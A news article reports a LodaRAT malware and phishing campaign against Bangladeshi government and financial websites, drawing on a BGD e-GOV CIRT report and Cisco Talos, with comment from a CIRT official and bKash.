Govt, financial institutions warned of ‘serious’ cyberattack

Cyberattack campaigns against the Bangladeshi government and private institutions have been identified recently, according to a report by the e-Government Computer Incident Response Team (BGD e-GOV CIRT).

The report found that websites like the coronavirus portal, that of the Bangladesh Police, Bangladesh Bank, Islami Bank, bKash, Brac Bank and some others were subjected to attack from a malware named ‘KASABLANKA’.

In this campaign attackers tried to allure the people interested for vaccination by using fake web portal (corona-bd.com/apply) like as Bangladesh government official COVID-19 vaccine programme-associated website.

Also noticeable that, attackers also use website layout of the legitimate site imei.info for their phishing site imei.today, hosts as the IMEI (numbers that uniquely identifies mobile phones) checker.

Through these phishing sites and domains attackers try to insists the victims (users of these portals) to download the LodaRAT malware.

The attacker also uses phishing email or SMS text to recipients to open a malicious RTF document that uses CVE-2017-11882 to download the malicious SCT file.

In these stages attackers does not use any obfuscation techniques and the code is written in plain text.

Primarily it seems that the “threat actor’s” motives behind this campaign are merely to spread their botnets within Bangladesh and possibly to tweak for espionage rather than purely breaching accounts for financial gains, said the report.

According to Cisco Talos Intelligence Group, one of the largest commercial threat intelligence gatherers in the world, “The fact that the threat group has evolved into hybrid campaigns targeting Windows and Android shows a group that is thriving and evolving.”

Researchers added that this is a ‘serious threat’ and can result in ‘significant data breach or heavy financial loss.’

Asked about the issue, Tarique M Barkatullah, project director of BGD e-GOV CIRT, said the relevant institutions should take preventive measures to avoid any big trouble.

“Currently, the malware is collecting various types of data secretly. With significant amount of data, it can create severe loss,” he added.

Shamsuddin Haider Dalim, bKash’s head of Corporate Communications, however, said that their platform is secured and fully functional.

“We are aware of the government report. All preventive measures are in place and we are in communication with the relevant authorities,” he added.

In this ongoing malware campaign, the threat actor uses particular variant of RAT named as LodaRAT. This variant has the ability to access and record the microphone and web camera of the targeted device. Furthermore, this specific malware will ‘unpack’ itself quietly to the ‘AppData’ directory, which is a deep system folder.

Though in previous, LodaRAT was able to infect windows-based system by exploiting remote access functionality, but in this campaign the evolved with capabilities of compromises android devices along with windows machines. According to Cisco talos ‘There is a new version of #LodaRAT that now targets Android devices.’